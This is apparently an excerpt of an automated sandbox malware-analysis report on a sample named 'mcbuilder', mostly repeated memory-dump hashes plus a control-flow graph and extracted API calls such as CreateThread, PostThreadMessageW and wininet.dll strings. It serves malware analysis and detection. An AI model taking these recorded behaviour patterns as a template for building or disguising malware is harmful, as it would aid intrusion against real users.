                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a7a62257dc9d64c53dc30b4002ea16112281dfcbd76acdecd40ee9278d1d1158
                                                • Instruction ID: fb932ce2b8a68e468951ffc187cdebae3820f52262aeee178d873c6a90d22817
                                                • Opcode Fuzzy Hash: a7a62257dc9d64c53dc30b4002ea16112281dfcbd76acdecd40ee9278d1d1158
                                                • Instruction Fuzzy Hash: BE90023120544C56D140B1984404A4A001587D1705F65C051A1068694D97258E59B662
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbddcc0414678144a36d812f2c6b1a754a679d8cb260f9583bb7b03ad41b592
                                                • Instruction ID: 86a592fb0558a2b450f5e3e32fd42bf7f018097df436f05cbecb4715078a07fd
                                                • Opcode Fuzzy Hash: 8dbddcc0414678144a36d812f2c6b1a754a679d8cb260f9583bb7b03ad41b592
                                                • Instruction Fuzzy Hash: 6D90023120140C16D180B198440464E000587D2701FA5C055A1029654DCB158B5D77A2
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7bf25214da855ff70ce45c024fde1be0db8fd6c9664490c25e4ba6bd30bfaf69
                                                • Instruction ID: b2dde39a0f4bbaf741d7f5e449a6c88e88b7265c596e971b85a8860654c4c69d
                                                • Opcode Fuzzy Hash: 7bf25214da855ff70ce45c024fde1be0db8fd6c9664490c25e4ba6bd30bfaf69
                                                • Instruction Fuzzy Hash: CD900261202404174105B198441461A400A87E1601B65C061E2018590DC62589956126
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ece2a4c36bc3642765c443b473de38b79623de5812af5f8fa054a1b159522c4e
                                                • Instruction ID: d15434150dee4510fdd565f05d23c6e36beb20ab88625a1ede054c4b03a1199d
                                                • Opcode Fuzzy Hash: ece2a4c36bc3642765c443b473de38b79623de5812af5f8fa054a1b159522c4e
                                                • Instruction Fuzzy Hash: 4C900225211404170105F598070450B004687D6751365C061F2019550CD72189655122
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f6c898ea7319fbcd3f69e4d195c4a80ab940349d981439625a7b0905354205e9
                                                • Instruction ID: f3e91e96adc52e1a21f1394d30f3a5e3aad96ad4f0df9acb38cf3a0e98eea99d
                                                • Opcode Fuzzy Hash: f6c898ea7319fbcd3f69e4d195c4a80ab940349d981439625a7b0905354205e9
                                                • Instruction Fuzzy Hash: C4900225221404160145F598060450F044597D77513A5C055F241A590CC72189695322
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 736757fd77b925f39d9e1b05ae73b3d27b65338b75a6ff71dc44f8ff911a31f5
                                                • Instruction ID: a3b4e65640a4637874450986802e20c5a80250d8fcb33f8d659ee5892a83b027
                                                • Opcode Fuzzy Hash: 736757fd77b925f39d9e1b05ae73b3d27b65338b75a6ff71dc44f8ff911a31f5
                                                • Instruction Fuzzy Hash: E1900221601404564140B1A8884490A4005ABE2611765C161A199C550D865989695666
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c6d357f79f892504a1d1fd6bd110a41867e1788f8754bbe566d06a008110d84c
                                                • Instruction ID: b5954394e255da94d3daedf2d108b4383195632ae441ac251c76b298d546f81f
                                                • Opcode Fuzzy Hash: c6d357f79f892504a1d1fd6bd110a41867e1788f8754bbe566d06a008110d84c
                                                • Instruction Fuzzy Hash: BA900221211C0456D200B5A84C14B0B000587D1703F65C155A1158554CCA1589655522
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 50bff3379c58b6c5c1c2a287a69fdc780c1d51b472dd54e24d789a955093ba21
                                                • Instruction ID: 960b097e6d2e01b361ded0d9fae3d48f190475c5a6f6613081eb8344a5d8008b
                                                • Opcode Fuzzy Hash: 50bff3379c58b6c5c1c2a287a69fdc780c1d51b472dd54e24d789a955093ba21
                                                • Instruction Fuzzy Hash: 2590026134140856D100B1984414B0A0005C7E2701F65C055E2068554D8719CD566127
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 013227927f7986aa8628bf928cfd1873bd4aee65a2c1a2533d5514eace0d7da2
                                                • Instruction ID: 6eae8658a672c4c0e41163e3df7f1e4f6759a6fe181b3ee4b836631221ba9dba
                                                • Opcode Fuzzy Hash: 013227927f7986aa8628bf928cfd1873bd4aee65a2c1a2533d5514eace0d7da2
                                                • Instruction Fuzzy Hash: 1F90022160140916D101B198440461A000A87D1641FA5C062A2028555ECB258A96A132
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d2521dd43f9215a9b32f1f27d4968e37919377112b006fc84e7a4cc47cc6ba30
                                                • Instruction ID: 40b01bda114e52a26455ca147544e396207afccdb08f0aad2763248a14233092
                                                • Opcode Fuzzy Hash: d2521dd43f9215a9b32f1f27d4968e37919377112b006fc84e7a4cc47cc6ba30
                                                • Instruction Fuzzy Hash: BF90026120180817D140B598480460B000587D1702F65C051A3068555E8B298D556136
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 39e3ec67badc4af311d5b3b7ad4911e5d60cd8f67a7808ef121db330c2b9e691
                                                • Instruction ID: 498111f7388b0468807327cdaf210c419ae533234f6b1f1d723faee8db6ca13b
                                                • Opcode Fuzzy Hash: 39e3ec67badc4af311d5b3b7ad4911e5d60cd8f67a7808ef121db330c2b9e691
                                                • Instruction Fuzzy Hash: 1A900221242445665545F198440450B400697E16417A5C052A2418950C8626995AD622
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a918508983d68eb49f3ba3e63e764ebae39a6f91c13cb341da4345243a7d9daf
                                                • Instruction ID: 373f15175d6682f8bbd1d0fc989697b3ade8cb5c857a559fa4c289b920f509a7
                                                • Opcode Fuzzy Hash: a918508983d68eb49f3ba3e63e764ebae39a6f91c13cb341da4345243a7d9daf
                                                • Instruction Fuzzy Hash: 1590023120140827D111B198450470B000987D1641FA5C452A1428558D97568A56A122
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 74fdac14f4eb93b5816de5abf340b20370c87c82fe6f0b75b1a305f18666122c
                                                • Instruction ID: 3f184bc9febcb9bb9313dc1690d142a30adb5fcc015f98cb3d6859b68d50b454
                                                • Opcode Fuzzy Hash: 74fdac14f4eb93b5816de5abf340b20370c87c82fe6f0b75b1a305f18666122c
                                                • Instruction Fuzzy Hash: 6890022921340416D180B198540860E000587D2602FA5D455A1019558CCA15896D5322
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 56604912e534c2bea4db20a917b6096652fee1a47e2e726a23355ca71ac36d73
                                                • Instruction ID: 7ce067421b6950b4017d9f42c1372a07b5c1bf864241348f10e1da952906bed0
                                                • Opcode Fuzzy Hash: 56604912e534c2bea4db20a917b6096652fee1a47e2e726a23355ca71ac36d73
                                                • Instruction Fuzzy Hash: C990022130140417D140B198541860A4005D7E2701F65D051E1418554CDA15895A5223
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 88f2036912366d61cf92807d69c35e2512cc2f89110e80bac740b0c0d11d9701
                                                • Instruction ID: cc0f66a404d2e8622c2ad58cfa301862d9ddace65720fff901ed3b59f1e4027f
                                                • Opcode Fuzzy Hash: 88f2036912366d61cf92807d69c35e2512cc2f89110e80bac740b0c0d11d9701
                                                • Instruction Fuzzy Hash: D390023120140816D100B5D8540864A000587E1701F65D051A6028555EC76589956132
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c966447e13af7c910bff747fff7a60a1fe0b4a380e1944e2c6d297b35577f183
                                                • Instruction ID: 127c33f0999d2af0774e6aabbf006b3ec74b366fe64b80d06ef5aaea790f9904
                                                • Opcode Fuzzy Hash: c966447e13af7c910bff747fff7a60a1fe0b4a380e1944e2c6d297b35577f183
                                                • Instruction Fuzzy Hash: BF90023120140C56D100B1984404B4A000587E1701F65C056A1128654D8715C9557522
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 32d015375a4f4c3c3be96b18638cd6ab321640f11373fca6b8a228e5ea900c4c
                                                • Instruction ID: b55eee49a72315fe8b08caaeaeca1457a27bb895c46cced9c72b790ba1c38452
                                                • Opcode Fuzzy Hash: 32d015375a4f4c3c3be96b18638cd6ab321640f11373fca6b8a228e5ea900c4c
                                                • Instruction Fuzzy Hash: 9F90023120148C16D110B198840474E000587D1701F69C451A5428658D879589957122
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c7884717a535d928405cce1629a2bc96047b03f25839cc51ad4a98742896d3f2
                                                • Instruction ID: 444c0678fe992d325e8ae9f542da8ae0399b89817fea8334ba868fb0e6937e3c
                                                • Opcode Fuzzy Hash: c7884717a535d928405cce1629a2bc96047b03f25839cc51ad4a98742896d3f2
                                                • Instruction Fuzzy Hash: 1890023160550816D100B198451470A100587D1601F75C451A1428568D87958A5565A3
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 798fc88916f69d3f1873b7dd02537204ad7291908de8d182230958b1fb0067ad
                                                • Instruction ID: 3dc14f93dfba07ef499b57ef290673dad8a2ea4c3fee9e1412106f8965d6d33d
                                                • Opcode Fuzzy Hash: 798fc88916f69d3f1873b7dd02537204ad7291908de8d182230958b1fb0067ad
                                                • Instruction Fuzzy Hash: F390022124545516D150B19C440461A4005A7E1601F65C061A1818594D865589596222

                                                Control-flow Graph

                                                control_flow_graph 36 3099b16-3099b1e 37 3099b20-3099e28 36->37 38 3099ad2-3099af1 call 30b1a50 36->38 39 3099e39-3099e45 37->39 46 3099b10-3099b15 38->46 47 3099af3-3099b0f call 30bc387 CreateThread 38->47 41 3099e58-3099e68 39->41 42 3099e47-3099e56 39->42 41->41 45 3099e6a 41->45 42->39 49 3099e71-3099e7b 45->49 51 3099e7d-3099e89 49->51 52 3099eb6-3099ec7 49->52 54 3099e8b-3099e8f 51->54 55 3099e90-3099e92 51->55 53 3099ed8-3099ee1 52->53 58 3099ef1-3099f02 53->58 59 3099ee3-3099eef 53->59 54->55 56 3099ea5-3099eae 55->56 57 3099e94-3099ea3 55->57 60 3099eb4 56->60 57->60 61 3099f13-3099f1f 58->61 59->53 60->49 63 3099f21-3099f33 61->63 64 3099f35-3099f3e 61->64 63->61 65 309a148-309a14f 64->65 66 3099f44-3099f4e 64->66 68 309a151-309a15b 65->68 69 309a1c5-309a1cf 65->69 70 3099f5f-3099f68 66->70 73 309a16c-309a175 68->73 71 3099f6a-3099f7c 70->71 72 3099f7e-3099f91 70->72 71->70 77 3099fa2-3099fae 72->77 75 309a18b call 30ba9c0 73->75 76 309a177-309a189 73->76 83 309a190-309a19a 75->83 79 309a15d-309a166 76->79 80 3099fc1-3099fcb 77->80 81 3099fb0-3099fbf 77->81 79->73 84 3099fdc-3099fe8 80->84 81->77 85 309a1ab-309a1b4 83->85 86 3099ff9-309a000 84->86 87 3099fea-3099ff7 84->87 85->69 88 309a1b6-309a1c3 85->88 90 309a021-309a030 86->90 91 309a002-309a01f 86->91 87->84 88->85 93 309a068-309a06f 90->93 94 309a032-309a03c 90->94 91->86 95 309a071-309a094 93->95 96 309a096-309a09d 93->96 97 309a04d-309a056 94->97 95->93 98 309a09f-309a0cc 96->98 99 309a0ce-309a0d8 96->99 100 309a058-309a061 97->100 101 309a063 97->101 98->96 103 309a0e9-309a0f2 99->103 100->97 101->65 104 309a108-309a10e 103->104 105 309a0f4-309a106 103->105 107 309a112-309a11e 104->107 105->103 108 309a120-309a141 107->108 109 309a143 107->109 108->107 109->64
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03099B05
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID: $v$&!$*-$2M$9h$=C$>M$G$J$NA$P~$R~$Ud$V$[*$[/$`$ht$oA$x$z$}$~*
                                                • API String ID: 2422867632-2677354048
                                                • Opcode ID: 8d5f8270bfd4235900d61818a203eaf8735bf8a2a01f29014bbf37873d5bc5ed
                                                • Instruction ID: 5cead3d11fd04366124263d3158fffafce23cec9a436fe68e16183bdc25c5dfc
                                                • Opcode Fuzzy Hash: 8d5f8270bfd4235900d61818a203eaf8735bf8a2a01f29014bbf37873d5bc5ed
                                                • Instruction Fuzzy Hash: 5E816DB0D06668CBEB60CF81C9587DEBBB1BB45309F1081C9D15D3B281D7BA1A89CF95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 0-4267580142
                                                • Opcode ID: 4cd0503204af95d54c07f702cae56d8d167117bd109d729d67297e97c164725b
                                                • Instruction ID: b405b7922e9ce49eba0309b375ee46afcd63337a5473e80b4f4a3fd9a7df8e45
                                                • Opcode Fuzzy Hash: 4cd0503204af95d54c07f702cae56d8d167117bd109d729d67297e97c164725b
                                                • Instruction Fuzzy Hash: B4215C72A0A64EBFDB21DB9CAC819EEBBBCEF81514B444259E554DB140D3365C12C7E0
                                                APIs
                                                • PostThreadMessageW.USER32(6fI63K3E,00000111,00000000,00000000), ref: 030A0C57
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 1836367815-4267580142
                                                • Opcode ID: 1d651c1194d2a3eadd96c5eae92e4cdbb4f98317b1bc6ae72f504a953765acb9
                                                • Instruction ID: d42e6f32386c89ea4ab70019b2eab6b26f356188de636a31af3bc51bd368fe78
                                                • Opcode Fuzzy Hash: 1d651c1194d2a3eadd96c5eae92e4cdbb4f98317b1bc6ae72f504a953765acb9
                                                • Instruction Fuzzy Hash: 0811D676D4624CBBDF10DBD8AC81DEEB77CEF80664F158195E904EB200D6765A068BA0
                                                APIs
                                                • PostThreadMessageW.USER32(6fI63K3E,00000111,00000000,00000000), ref: 030A0C57
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 1836367815-4267580142
                                                • Opcode ID: 058576c14129df8b9d782bf43e05fd92112a3ab973b3769d3ae6280fb0efee6a
                                                • Instruction ID: b3b53b31f61d7d046ab8c83d5884b6139d44ab31617452c580ea63a6edd5f5cb
                                                • Opcode Fuzzy Hash: 058576c14129df8b9d782bf43e05fd92112a3ab973b3769d3ae6280fb0efee6a
                                                • Instruction Fuzzy Hash: 9D11E5B2D4220CBEEB10D7E49C81DEF7B7CDF41694F048165FA04AB140D6755E068BB1
                                                APIs
                                                • PostThreadMessageW.USER32(6fI63K3E,00000111,00000000,00000000), ref: 030A0C57
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 1836367815-4267580142
                                                • Opcode ID: 1f2dd26d3e569d984f086c3ab4398186aa34cc3851bdab4f2319c850c6a25781
                                                • Instruction ID: 22b8d035d38f79d8a2de2531ddf04c300be1c3d68bc1ccb039ff5aa3b8998643
                                                • Opcode Fuzzy Hash: 1f2dd26d3e569d984f086c3ab4398186aa34cc3851bdab4f2319c850c6a25781
                                                • Instruction Fuzzy Hash: 4301C4B6D0120C7AEB10EBE48C81DEF7B7CDF81694F048064FA04BB140E5755E068BB1
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 030B345B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 833a7beef45bcb0bb492a8c6267be1a8c88a7dd8e67e648e13b477a6b8e0ea2c
                                                • Instruction ID: fa702ecaf109a863feb7e93f1860d02c8946177796a1c7f29a7980e086448567
                                                • Opcode Fuzzy Hash: 833a7beef45bcb0bb492a8c6267be1a8c88a7dd8e67e648e13b477a6b8e0ea2c
                                                • Instruction Fuzzy Hash: 823183B5A02705BBDB14DFA4C884FEBB7B8FB88710F54456DA61D6B240D770BA40CBA4
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,?,?,030B4F6E,030A1B53), ref: 030A1BB8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
